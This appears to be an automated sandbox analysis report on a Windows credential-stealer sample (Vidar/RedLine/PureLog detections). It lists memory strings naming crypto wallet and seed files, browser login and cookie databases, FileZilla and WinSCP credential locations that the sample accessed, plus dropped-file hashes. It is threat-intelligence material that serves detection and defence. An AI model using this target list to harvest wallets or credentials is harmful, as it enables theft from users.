Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.0.CAFIJKFHIJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\CAFIJKFHIJ.exe, type: DROPPED

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe PID: 6016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9E0C40 sqlite3_bind_zeroblob,	3_2_6C9E0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9E0D60 sqlite3_bind_parameter_name,	3_2_6C9E0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C908EA0 sqlite3_clear_bindings,	3_2_6C908EA0

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1427675
Product:	CloudBasic
Start time:	23:29:06
Start date:	17.04.2024
Sample:	SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	98fa9d5bea93312c32be83bf43d6a47b
SHA1:	bbb33093f8475548308840af9aaf839f02668deb
SHA256:	14d6115881dcd0df5a9fddef6e72547b797b004261602b1a618d610fc04de40a
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AKECBFBAEBKJJJJKFCGC	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\BKEBFHIJ	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\CAFIJKFHIJ.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	C8C3778E40B9CF5724245BE630907756	8A68CF05081106DAE51FAB97C9D044DFF98C780A	9BFE195AAEE63E17887A211D9C9D88F819E5B49B19FD6DEA1EC020DACBE8B34E
C:\ProgramData\CFIIIJJKJKFHIDGDBAKJEBKEGC	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\EHCBAAAFHJDHJJKEBGHIECAKJK	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\IDHDGDHJEGHIDGDHCGCB	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\IEHCBAFI	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2	A2D1F4CF66465F9F0CAC61C4A95C7EDE	BA6A845E247B221AAEC96C4213E1FD3744B10A27	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
C:\ProgramData\JDHJKKFB	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\JKKFIIEB	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CAFIJKFHIJ.exe.log	CSV text	CBE559A14BF4CADD6A6FC81D1D239905	F1B8FBCA621CAD90C9CA45DF1096AD195D945A5D	2A8C2776F009508BBE09B24665C153F0CBEF03289F1B450E2CAC824066B256C2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators	B67985F50F522290004D8A3063F0A297	1450F91E6DCC31F69BF2BBEE6DAAB748FA375792	28A659BA254B691BD7328518DCE38F2DB9C2605D4DA07EC54D06209DE5E8398E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	C8C3778E40B9CF5724245BE630907756	8A68CF05081106DAE51FAB97C9D044DFF98C780A	9BFE195AAEE63E17887A211D9C9D88F819E5B49B19FD6DEA1EC020DACBE8B34E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
